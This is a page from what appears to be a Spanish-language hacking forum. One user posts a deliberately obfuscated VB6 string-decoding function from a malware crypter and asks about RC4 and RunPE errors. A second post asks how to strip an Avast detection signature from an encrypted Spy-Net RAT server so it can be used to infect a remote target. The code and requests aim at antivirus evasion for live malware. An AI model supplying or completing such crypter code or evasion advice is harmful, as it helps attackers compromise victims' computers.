Public Function cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJFvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJW As String, qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzSqXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzSE As Integer)
   Dim rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxrEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxR As Integer
    For rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxrEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxR = 1 To Len(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJFvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJW)
        Mid(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJFvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJW, rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxrEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxR, 1) = Chr(Asc(Mid(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJFvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJW, rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxrEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxR, 1)) - qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzSqXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzSE)
    Next rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxrEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJaxR
cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa = FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJFvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJW
End Function


El error que me da al realizar todos estos pasos es el siguiente :

Supongo que es la llamada al nombre del RC4 que no tengo idea de cual es!
Y dentro de los recuadros pequeños existe algo señhaA que deberia de ser Contraseña!
al igual no tengo idea de cual es en el RC4 o Runpe!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si alguien es tan amable porfavor ayudame! nunca sabes de quien puedas necesitar!
Muchas Gracias!

#4
Dudas y pedidos generales / Av's Salta en el Encryptado : Server Spy-Net
Noviembre 01, 2017, 03:48:45 PM
Buenas , Antes que nada Gracias por permitirme Formar parte de su Gran familia!
Espero Mis Preguntas Se conviertan a futuro en Respuestas que puedan Ayudar a otros!

Les comento que Estoy modeando un Crypter desde Binario! Y cuando hace mucho me interese por este tema Simplemente lo modeaba desde el Source! VB 6.0 Asi se iban algunos Antivirus Y por medio de Tips que para entonces eran funcionales siempre Lograba un buen resultado salvo la Mancha de Avira!

Pues no tengo Ahorita Generadores , Y los que haya encontrado por alli o los enlaces estan Rotos o simplemente hasta las String tienen 40/40 , Y no tengo tanto tiempo para dedicarle!

Pasa que con un simple Avfucker Logre sacar la Firma de : Win32:malware-Gen del Avast!
Eso fue ayer por la nocheee! .. , Hoy cuando entro y me dispongo a crear lo que sera el metodo de infeccion para el remoto que necesito , cuando vuelvo a encryptar el server POMMMMMMMM Me fijo que en el encryptado me salta el avast con esa firma! que '' Supuestamente ya fue retirada desde el HEX'' EL STUB ESTA LIMPIO , Y LA BOLITA PARA MODEAR IGUAL! PERO el server.exe de SpyneT 2.6 esta sucio!!!, entonces mi pregunta es como podria sacar la firma del encryptadoo?

ES URGENTE PORFAVOR! :c

Muchas gracias de antemanos! saludos!
Páginas1